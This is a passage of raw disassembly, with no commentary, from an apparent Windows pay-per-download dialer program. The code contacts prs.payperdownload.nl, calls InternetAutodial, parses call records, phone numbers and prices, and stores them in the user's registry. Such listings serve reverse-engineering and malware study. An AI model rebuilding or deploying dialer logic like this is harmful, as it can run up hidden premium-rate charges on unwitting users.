loc_407225: ; CODE XREF: sub_406E60+3BA�j
mov [ebp+var_4C], ebx
loc_407228: ; CODE XREF: sub_406E60+194�j
; sub_406E60+1B1�j ...
mov eax, [ebp+var_50]
inc esi
inc edi
inc ebx
cmp esi, eax
jb loc_406F97
loc_407236: ; CODE XREF: sub_406E60+13C�j
mov eax, [ebp+var_24]
mov edx, [ebp+var_1C]
loc_40723C: ; CODE XREF: sub_406E60+126�j
mov esi, [ebp+cbData]
mov ecx, 13h
sub eax, esi
cmp eax, 13h
mov [ebp+cbData], eax
jg short loc_407250
mov ecx, eax
loc_407250: ; CODE XREF: sub_406E60+3EC�j
mov ebx, ecx
lea esi, [ebp+esi+var_B10]
lea edi, [ebp+String2]
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov esi, [ebp+var_18]
mov [ebp+eax+String2], 0
sub edx, esi
mov ecx, 13h
mov eax, edx
cmp eax, 13h
mov [ebp+var_1C], eax
jg short loc_407289
mov ecx, eax
loc_407289: ; CODE XREF: sub_406E60+425�j
mov edx, ecx
lea esi, [ebp+esi+var_B10]
lea edi, [ebp+var_B0]
shr ecx, 2
rep movsd
mov ecx, edx
mov edx, [ebp+var_28]
and ecx, 3
rep movsb
mov [ebp+eax+var_B0], 0
mov eax, [ebp+dwDisposition]
sub eax, edx
mov ecx, 1Dh
cmp eax, 1Dh
mov [ebp+var_28], eax
jg short loc_4072C3
mov ecx, eax
loc_4072C3: ; CODE XREF: sub_406E60+45F�j
lea esi, [ebp+edx+var_B10]
mov edx, ecx
lea edi, [ebp+var_F0]
shr ecx, 2
rep movsd
mov ecx, edx
mov edx, [ebp+var_48]
and ecx, 3
rep movsb
mov [ebp+eax+var_F0], 0
mov eax, [ebp+var_34]
sub eax, edx
mov ecx, 1Dh
cmp eax, 1Dh
mov [ebp+var_24], eax
jg short loc_4072FD
mov ecx, eax
loc_4072FD: ; CODE XREF: sub_406E60+499�j
lea esi, [ebp+edx+var_B10]
mov edx, ecx
lea edi, [ebp+var_D0]
shr ecx, 2
rep movsd
mov ecx, edx
mov edx, [ebp+hKey]
and ecx, 3
rep movsb
mov [ebp+eax+var_D0], 0
mov eax, [ebp+var_38]
sub eax, edx
cmp eax, 4
mov [ebp+var_18], eax
jle short loc_407335
mov eax, 4
loc_407335: ; CODE XREF: sub_406E60+4CE�j
mov ecx, eax
mov eax, [ebp+hKey]
mov edx, ecx
lea edi, [ebp+var_40]
lea esi, [ebp+eax+var_B10]
mov ebx, [ebp+var_2C]
shr ecx, 2
rep movsd
mov eax, [ebp+var_18]
mov ecx, edx
mov edx, [ebp+var_4C]
and ecx, 3
sub ebx, edx
rep movsb
cmp ebx, 4
mov [ebp+eax+var_40], 0
mov ecx, 4
jg short loc_40736E
mov ecx, ebx
loc_40736E: ; CODE XREF: sub_406E60+50A�j
lea esi, [ebp+edx+var_B10]
mov edx, ecx
lea edi, [ebp+var_34]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
test eax, eax
mov byte ptr [ebp+ebx+var_34], 0
jle loc_4074D8
test ebx, ebx
jle loc_4074D8
mov esi, [ebp+var_18]
lea eax, [ebp+var_40]
push esi
push eax
push offset aXx ; "xx"
call sub_40B490
add esp, 0Ch
test eax, eax
jz short loc_4073CE
lea ecx, [ebp+var_40]
push esi
push ecx
push offset aXx_0 ; "XX"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz loc_4074D8
loc_4073CE: ; CODE XREF: sub_406E60+552�j
mov eax, [ebp+cbData]
lea esi, [ebp+String2]
mov ecx, eax
lea edi, [ebp+var_110]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_28]
lea esi, [ebp+var_F0]
mov [ebp+var_2C], ecx
mov edx, ecx
shr ecx, 2
lea edi, [ebp+var_7C]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_18]
lea esi, [ebp+var_B0]
mov [ebp+var_38], ecx
mov ecx, [ebp+var_1C]
mov [ebp+cbData], ecx
mov edx, ecx
shr ecx, 2
lea edi, [ebp+String2]
mov [ebp+var_1C], eax
rep movsd
mov ecx, edx
mov [ebp+var_18], ebx
and ecx, 3
rep movsb
mov ecx, edx
lea esi, [ebp+var_D0]
lea edi, [ebp+var_F0]
mov [ebp+ecx+String2], 0
mov ecx, [ebp+var_24]
mov [ebp+var_28], ecx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, edx
lea esi, [ebp+var_34]
lea edi, [ebp+var_40]
mov [ebp+ecx+var_F0], 0
mov ecx, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, eax
lea esi, [ebp+var_110]
mov edx, ecx
lea edi, [ebp+var_B0]
shr ecx, 2
rep movsd
mov ecx, edx
mov [ebp+ebx+var_40], 0
and ecx, 3
rep movsb
mov [ebp+eax+var_B0], 0
mov eax, [ebp+var_2C]
mov ecx, eax
lea esi, [ebp+var_7C]
mov edx, ecx
lea edi, [ebp+var_D0]
shr ecx, 2
rep movsd
mov ecx, edx
mov [ebp+var_24], eax
and ecx, 3
rep movsb
mov [ebp+eax+var_D0], 0
mov eax, [ebp+var_38]
mov byte ptr [ebp+eax+var_34], 0
loc_4074D8: ; CODE XREF: sub_406E60+52D�j
; sub_406E60+535�j ...
mov eax, [ebp+cbData]
xor ebx, ebx
cmp eax, ebx
jle loc_4077BE
mov ecx, [ebp+var_54]
lea edx, [ebp+String]
push 200h ; cchBufferMax
push edx ; lpBuffer
mov eax, [ecx+1Ch]
push 71h ; uID
push eax ; hInstance
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_80], ebx
mov [ebp+var_7C], bl
mov [ebp+var_5E], bl
call ds:LoadStringA ; LoadStringA
mov esi, eax
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
mov edi, ds:lstrlenA
cmp esi, ebx
jz short loc_4075A3
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_40755B
xor eax, eax
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_4075A9
; ---------------------------------------------------------------------------
loc_407549: ; CODE XREF: sub_406E60+166�j
mov eax, 0FFFFFFFDh
lea esp, [ebp-0B1Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40755B: ; CODE XREF: sub_406E60+6D6�j
lea edx, [ebp+String]
push edx ; lpString
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, ebx
xor ebx, ebx
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_4075A9
; ---------------------------------------------------------------------------
loc_4075A3: ; CODE XREF: sub_406E60+6CC�j
mov [ebp+bstrString], ebx
loc_4075A9: ; CODE XREF: sub_406E60+6E7�j
; sub_406E60+741�j
mov ecx, offset MultiByteStr ; "\\"
test ecx, ecx
jnz short loc_4075B9
xor eax, eax
mov [ebp+var_2C], eax
jmp short loc_4075F1
; ---------------------------------------------------------------------------
loc_4075B9: ; CODE XREF: sub_406E60+750�j
push offset MultiByteStr ; "\\"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push offset MultiByteStr ; "\\"
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, ebx
xor ebx, ebx
mov [ebp+var_2C], eax
loc_4075F1: ; CODE XREF: sub_406E60+757�j
push eax ; lpString
call ds:lstrlenW ; lstrlenW
mov edi, eax
mov eax, [ebp+bstrString]
cmp eax, ebx
mov [ebp+var_38], edi
jnz short loc_40760B
xor esi, esi
jmp short loc_407614
; ---------------------------------------------------------------------------
loc_40760B: ; CODE XREF: sub_406E60+7A5�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_407614: ; CODE XREF: sub_406E60+7A9�j
lea eax, [esi+edi]
push eax ; ui
push 0 ; strIn
mov [ebp+var_34], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_407679
lea eax, [esi+esi]
mov esi, [ebp+bstrString]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_38]
mov esi, [ebp+var_2C]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_34]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov word ptr [ebx+eax*2], 0
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
mov [ebp+bstrString], ebx
loc_407679: ; CODE XREF: sub_406E60+7C7�j
mov edi, [ebp+var_54]
push 7Ah ; bstrString
lea ecx, [ebp+bstrString]
mov edx, [edi+1Ch]
push edx ; hInstance
call sub_40A840
lea eax, [ebp+dwDisposition]
lea ecx, [ebp+hKey]
push eax ; lpdwDisposition
push ecx ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
lea ecx, [ebp+bstrString]
call sub_40A2D0
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegCreateKeyExA ; RegCreateKeyExA
test eax, eax
jnz loc_407750
mov edx, [ebp+cbData]
mov ecx, [ebp+hKey]
mov esi, ds:RegSetValueExA
lea eax, [ebp+String2]
push edx ; cbData
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
push offset aPhonenumber1 ; "phonenumber1"
push ecx ; hKey
call esi ; RegSetValueExA
mov edx, [ebp+var_1C]
mov ecx, [ebp+hKey]
lea eax, [ebp+var_B0]
push edx ; cbData
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
push offset aPhonenumber2 ; "phonenumber2"
push ecx ; hKey
call esi ; RegSetValueExA
mov edx, [ebp+var_28]
mov ecx, [ebp+hKey]
lea eax, [ebp+var_F0]
push edx ; cbData
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
push offset aPrice1 ; "price1"
push ecx ; hKey
call esi ; RegSetValueExA
mov edx, [ebp+var_24]
mov ecx, [ebp+hKey]
lea eax, [ebp+var_D0]
push edx ; cbData
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
push offset aPrice2 ; "price2"
push ecx ; hKey
call esi ; RegSetValueExA
mov edx, [ebp+var_18]
mov ecx, [ebp+hKey]
lea eax, [ebp+var_40]
push edx ; cbData
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
push offset aCc ; "cc"
push ecx ; hKey
call esi ; RegSetValueExA
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_407750: ; CODE XREF: sub_406E60+85B�j
lea eax, [ebp+String2]
lea esi, [edi+20h]
push eax ; lpString2
push 1 ; int
mov ecx, esi
call sub_409350
lea ecx, [ebp+var_B0]
push ecx ; lpString2
push 2 ; int
mov ecx, esi
call sub_409350
mov eax, [ebp+lpMem]
xor esi, esi
test eax, eax
jz short loc_40778E
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], esi
loc_40778E: ; CODE XREF: sub_406E60+91D�j
mov edx, [ebp+bstrString]
push edx ; bstrString
call ds:SysFreeString
mov eax, [ebp+var_5C]
push eax
call ds:InternetCloseHandle ; InternetCloseHandle
mov ecx, [ebp+var_58]
push ecx
call ds:InternetCloseHandle ; InternetCloseHandle
mov eax, esi
lea esp, [ebp-0B1Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4077BE: ; CODE XREF: sub_406E60+67F�j
mov esi, 0FFFFFFFDh
loc_4077C3: ; CODE XREF: sub_406E60+A9�j
; sub_406E60+B4�j
mov eax, [ebp+var_5C]
push eax
call ds:InternetCloseHandle ; InternetCloseHandle
mov ecx, [ebp+var_58]
push ecx
call ds:InternetCloseHandle ; InternetCloseHandle
mov eax, esi
lea esp, [ebp-0B1Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4077E6: ; CODE XREF: sub_406E60+85�j
mov ecx, [ebp+var_58]
mov esi, 0FFFFFFFEh
push ecx
call ds:InternetCloseHandle ; InternetCloseHandle
mov eax, esi
lea esp, [ebp-0B1Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407804: ; CODE XREF: sub_406E60+2B�j
; sub_406E60+48�j ...
lea esp, [ebp-0B1Ch]
or eax, 0FFFFFFFFh
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_406E60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407820 proc near ; CODE XREF: sub_406720+327�p
; sub_406720+333�p
var_E98 = byte ptr -0E98h
var_698 = byte ptr -698h
String = byte ptr -298h
var_98 = byte ptr -98h
String2 = byte ptr -78h
bstrString = dword ptr -64h
lpMem = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_3A = byte ptr -3Ah
var_38 = dword ptr -38h
dwDisposition = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
cbData = dword ptr -1Ch
var_18 = dword ptr -18h
lpString = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
hKey = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0E98h
push ebx
push esi
mov esi, ds:InternetCheckConnectionA
push edi
push 0
mov edi, ecx
push 1
push offset aHttpPrs_payper ; "http://prs.payperdownload.nl"
mov [ebp+var_20], edi
call esi ; InternetCheckConnectionA
test eax, eax
jnz short loc_40786E
mov al, [edi+54h]
test al, al
jnz loc_407EA2
push 0
push 2
call ds:InternetAutodial ; InternetAutodial
push 0
push 1
push offset aHttpPrs_payper ; "http://prs.payperdownload.nl"
call esi ; InternetCheckConnectionA
test eax, eax
jz loc_407EA2
loc_40786E: ; CODE XREF: sub_407820+24�j
push 0
push 0
push 0
push 0
push offset aDel ; "del"
call ds:InternetOpenA ; InternetOpenA
mov ebx, eax
test ebx, ebx
mov [ebp+var_24], ebx
jz loc_407EA2
mov edi, offset aHttpPrs_payp_1 ; "http://prs.payperdownload.nl/radius/dia"...
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [ebp+var_698]
repne scasb
not ecx
sub edi, ecx
push 0
mov eax, ecx
mov esi, edi
mov edi, edx
push 0
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
push 0
rep movsb
lea edi, [ebp+var_698]
or ecx, 0FFFFFFFFh
repne scasb
mov edi, [ebp+arg_0]
push 0
not ecx
dec ecx
lea edx, [ebp+ecx+var_698]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_698]
push ecx
push ebx
call ds:InternetOpenUrlA ; InternetOpenUrlA
mov esi, eax
test esi, esi
mov [ebp+var_2C], esi
jz loc_407E85
lea edx, [ebp+var_28]
lea eax, [ebp+var_E98]
push edx
push 800h
push eax
push esi
mov edi, 0FFFFFFFDh
call ds:InternetReadFile ; InternetReadFile
test eax, eax
jz loc_407E66
mov eax, [ebp+var_28]
xor ecx, ecx
cmp eax, ecx
jz loc_407E66
xor esi, esi
cmp eax, ecx
mov [ebp+eax+var_E98], cl
mov [ebp+var_5], 0
mov [ebp+var_3], 0
mov [ebp+var_4], 0
mov [ebp+var_D], 0
mov [ebp+var_F], 0
mov [ebp+var_2], 0
mov [ebp+var_1], 0
mov [ebp+var_E], 0
mov [ebp+lpString], ecx
mov [ebp+cbData], ecx
mov [ebp+hKey], ecx
mov [ebp+var_18], ecx
jbe loc_407B0F
mov ebx, 1
lea edi, [ebp+var_E98]
jmp short loc_40798B
; ---------------------------------------------------------------------------
loc_407989: ; CODE XREF: sub_407820+2E9�j
xor ecx, ecx
loc_40798B: ; CODE XREF: sub_407820+167�j
mov al, [ebp+var_E]
test al, al
jnz loc_407B0F
movsx eax, byte ptr [edi]
sub eax, 22h
jz loc_407AC7
sub eax, 1Ah
jz loc_407AC1
sub eax, 2
jz loc_407A9F
cmp ebx, 7D1h
jg loc_407BE4
mov al, [ebp+var_4]
test al, al
jz short loc_407A30
push 0Bh
push edi
push offset aCallrecords ; "callrecords"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_4079ED
add esi, 0Ah
add edi, 0Ah
mov [ebp+var_5], 1
add ebx, 0Ah
jmp loc_407B01
; ---------------------------------------------------------------------------
loc_4079ED: ; CODE XREF: sub_407820+1B9�j
push 0Ch
push edi
push offset aCallrecords_0 ; "/callrecords"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_407A0A
mov [ebp+var_E], 1
jmp loc_407B01
; ---------------------------------------------------------------------------
loc_407A0A: ; CODE XREF: sub_407820+1DF�j
push 4
push edi
push offset aCall ; "call"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_407A30
add esi, 3
add edi, 3
mov [ebp+var_3], 1
add ebx, 3
jmp loc_407B01
; ---------------------------------------------------------------------------
loc_407A30: ; CODE XREF: sub_407820+1A5�j
; sub_407820+1FC�j
mov al, [ebp+var_3]
test al, al
jz loc_407B01
push 0Ah
push edi
push offset aRealnumber ; "realnumber"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_407A6F
mov [ebp+var_2], al
mov al, [ebp+var_D]
test al, al
jnz short loc_407A5D
mov [ebp+var_2], 1
loc_407A5D: ; CODE XREF: sub_407820+237�j
add esi, 9
add edi, 9
mov [ebp+var_1], 0
add ebx, 9
jmp loc_407B01
; ---------------------------------------------------------------------------
loc_407A6F: ; CODE XREF: sub_407820+22D�j
push 5
push edi
push offset aPrice ; "price"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_407B01
mov [ebp+var_2], al
mov [ebp+var_1], al
mov al, [ebp+var_F]
test al, al
jnz short loc_407A94
mov [ebp+var_1], 1
loc_407A94: ; CODE XREF: sub_407820+26E�j
add esi, 4
add edi, 4
add ebx, 4
jmp short loc_407B01
; ---------------------------------------------------------------------------
loc_407A9F: ; CODE XREF: sub_407820+18E�j
mov al, [ebp+var_5]
test al, al
jz short loc_407AB0
mov [ebp+var_5], 0
mov [ebp+var_4], 0
jmp short loc_407B01
; ---------------------------------------------------------------------------
loc_407AB0: ; CODE XREF: sub_407820+284�j
mov al, [ebp+var_3]
test al, al
jz short loc_407ABB
mov [ebp+var_3], 0
loc_407ABB: ; CODE XREF: sub_407820+295�j
mov [ebp+var_4], 0
jmp short loc_407B01
; ---------------------------------------------------------------------------
loc_407AC1: ; CODE XREF: sub_407820+185�j
mov [ebp+var_4], 1
jmp short loc_407B01
; ---------------------------------------------------------------------------
loc_407AC7: ; CODE XREF: sub_407820+17C�j
mov al, [ebp+var_2]
test al, al
jz short loc_407AE5
cmp [ebp+lpString], ecx
jle short loc_407AE0
mov [ebp+var_2], 0
mov [ebp+var_D], 1
mov [ebp+cbData], esi
jmp short loc_407B01
; ---------------------------------------------------------------------------
loc_407AE0: ; CODE XREF: sub_407820+2B1�j
mov [ebp+lpString], ebx
jmp short loc_407B01
; ---------------------------------------------------------------------------
loc_407AE5: ; CODE XREF: sub_407820+2AC�j
mov al, [ebp+var_1]
test al, al
jz short loc_407B01
cmp [ebp+hKey], ecx
jle short loc_407AFE
mov [ebp+var_1], 0
mov [ebp+var_F], 1
mov [ebp+var_18], esi
jmp short loc_407B01
; ---------------------------------------------------------------------------
loc_407AFE: ; CODE XREF: sub_407820+2CF�j
mov [ebp+hKey], ebx
loc_407B01: ; CODE XREF: sub_407820+1C8�j
; sub_407820+1E5�j ...
mov eax, [ebp+var_28]
inc esi
inc edi
inc ebx
cmp esi, eax
jb loc_407989
loc_407B0F: ; CODE XREF: sub_407820+156�j
; sub_407820+170�j
mov eax, [ebp+lpString]
mov edx, [ebp+cbData]
sub edx, eax
mov ecx, 13h
cmp edx, 13h
mov [ebp+cbData], edx
jg short loc_407B26
mov ecx, edx
loc_407B26: ; CODE XREF: sub_407820+302�j
lea esi, [ebp+eax+var_E98]
mov eax, ecx
lea edi, [ebp+String2]
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_18]
and ecx, 3
rep movsb
mov esi, [ebp+hKey]
mov [ebp+edx+String2], 0
sub eax, esi
mov ecx, 27h
cmp eax, 27h
mov [ebp+var_18], eax
jg short loc_407B5A
mov ecx, eax
loc_407B5A: ; CODE XREF: sub_407820+336�j
mov esi, [ebp+hKey]
mov ebx, ecx
lea edi, [ebp+var_98]
lea esi, [ebp+esi+var_E98]
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
xor edi, edi
mov [ebp+eax+var_98], 0
cmp edx, edi
jle loc_407E5B
mov ecx, [ebp+var_20]
lea edx, [ebp+String]
push 200h ; cchBufferMax
push edx ; lpBuffer
mov eax, [ecx+1Ch]
push 71h ; uID
push eax ; hInstance
mov [ebp+bstrString], edi
mov [ebp+lpMem], edi
mov [ebp+var_5C], edi
mov [ebp+var_58], 0
mov [ebp+var_3A], 0
call ds:LoadStringA ; LoadStringA
mov esi, eax
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
mov ebx, ds:lstrlenA
cmp esi, edi
jz short loc_407C3D
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_407BF8
xor eax, eax
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_407C40
; ---------------------------------------------------------------------------
loc_407BE4: ; CODE XREF: sub_407820+19A�j
mov eax, 0FFFFFFFDh
lea esp, [ebp-0EA4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_407BF8: ; CODE XREF: sub_407820+3B4�j
lea edx, [ebp+String]
push edx ; lpString
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [edi], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, edi
xor edi, edi
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_407C40
; ---------------------------------------------------------------------------
loc_407C3D: ; CODE XREF: sub_407820+3AA�j
mov [ebp+bstrString], edi
loc_407C40: ; CODE XREF: sub_407820+3C2�j
; sub_407820+41B�j
mov ecx, offset MultiByteStr ; "\\"
test ecx, ecx
jnz short loc_407C4E
mov [ebp+lpString], edi
jmp short loc_407C84
; ---------------------------------------------------------------------------
loc_407C4E: ; CODE XREF: sub_407820+427�j
push offset MultiByteStr ; "\\"
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push offset MultiByteStr ; "\\"
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [edi], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+lpString], edi
xor edi, edi
loc_407C84: ; CODE XREF: sub_407820+42C�j
mov edx, [ebp+lpString]
push edx ; lpString
call ds:lstrlenW ; lstrlenW
mov ebx, eax
mov eax, [ebp+bstrString]
cmp eax, edi
mov [ebp+var_38], ebx
jnz short loc_407C9E
xor esi, esi
jmp short loc_407CA7
; ---------------------------------------------------------------------------
loc_407C9E: ; CODE XREF: sub_407820+478�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_407CA7: ; CODE XREF: sub_407820+47C�j
lea eax, [esi+ebx]
push eax ; ui
push edi ; strIn
mov [ebp+var_30], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_407D02
lea eax, [esi+esi]
mov esi, [ebp+bstrString]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_38]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_30]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov word ptr [ebx+eax*2], 0
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
mov [ebp+bstrString], ebx
loc_407D02: ; CODE XREF: sub_407820+499�j
mov edi, [ebp+var_20]
push 7Ah ; bstrString
lea ecx, [ebp+bstrString]
mov edx, [edi+1Ch]
push edx ; hInstance
call sub_40A840
mov eax, [ebp+arg_0]
push 2
push offset aXx ; "xx"
push eax
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_407D9C
lea ecx, [ebp+dwDisposition]
lea edx, [ebp+hKey]
push ecx ; lpdwDisposition
push edx ; phkResult
push eax ; lpSecurityAttributes
push 0F003Fh ; samDesired
push eax ; dwOptions
push eax ; lpClass
push eax ; Reserved
lea ecx, [ebp+bstrString]
call sub_40A2D0
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegCreateKeyExA ; RegCreateKeyExA
test eax, eax
jnz short loc_407D94
mov eax, [ebp+cbData]
mov edx, [ebp+hKey]
mov esi, ds:RegSetValueExA
lea ecx, [ebp+String2]
push eax ; cbData
push ecx ; lpData
push 1 ; dwType
push 0 ; Reserved
push offset aPhonenumber2 ; "phonenumber2"
push edx ; hKey
call esi ; RegSetValueExA
mov eax, [ebp+var_18]
mov edx, [ebp+hKey]
lea ecx, [ebp+var_98]
push eax ; cbData
push ecx ; lpData
push 1 ; dwType
push 0 ; Reserved
push offset aPrice2 ; "price2"
push edx ; hKey
call esi ; RegSetValueExA
mov eax, [ebp+hKey]
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_407D94: ; CODE XREF: sub_407820+531�j
lea ecx, [ebp+String2]
push ecx
push 2
jmp short loc_407E0F
; ---------------------------------------------------------------------------
loc_407D9C: ; CODE XREF: sub_407820+508�j
lea edx, [ebp+dwDisposition]
lea eax, [ebp+hKey]
push edx ; lpdwDisposition
push eax ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
lea ecx, [ebp+bstrString]
call sub_40A2D0
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegCreateKeyExA ; RegCreateKeyExA
test eax, eax
jnz short loc_407E09
mov ecx, [ebp+cbData]
mov esi, ds:RegSetValueExA
lea edx, [ebp+String2]
push ecx ; cbData
push edx ; lpData
push 1 ; dwType
push eax ; Reserved
mov eax, [ebp+hKey]
push offset aPhonenumber1 ; "phonenumber1"
push eax ; hKey
call esi ; RegSetValueExA
mov ecx, [ebp+var_18]
mov eax, [ebp+hKey]
lea edx, [ebp+var_98]
push ecx ; cbData
push edx ; lpData
push 1 ; dwType
push 0 ; Reserved
push offset aPrice1 ; "price1"
push eax ; hKey
call esi ; RegSetValueExA
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_407E09: ; CODE XREF: sub_407820+5A7�j
lea edx, [ebp+String2]
push edx ; lpString2
push 1 ; int
loc_407E0F: ; CODE XREF: sub_407820+57A�j
lea ecx, [edi+20h]
call sub_409350
mov eax, [ebp+lpMem]
xor edi, edi
cmp eax, edi
jz short loc_407E2C
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], edi
loc_407E2C: ; CODE XREF: sub_407820+5FE�j
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
mov esi, [ebp+var_2C]
mov ebx, [ebp+var_24]
push esi
call ds:InternetCloseHandle ; InternetCloseHandle
push ebx
call ds:InternetCloseHandle ; InternetCloseHandle
mov eax, edi
lea esp, [ebp-0EA4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_407E5B: ; CODE XREF: sub_407820+364�j
mov ebx, [ebp+var_24]
mov esi, [ebp+var_2C]
mov edi, 0FFFFFFFDh
loc_407E66: ; CODE XREF: sub_407820+10C�j
; sub_407820+119�j
push esi
call ds:InternetCloseHandle ; InternetCloseHandle
push ebx
call ds:InternetCloseHandle ; InternetCloseHandle
mov eax, edi
lea esp, [ebp-0EA4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_407E85: ; CODE XREF: sub_407820+E8�j
push ebx
mov edi, 0FFFFFFFEh
call ds:InternetCloseHandle ; InternetCloseHandle
mov eax, edi
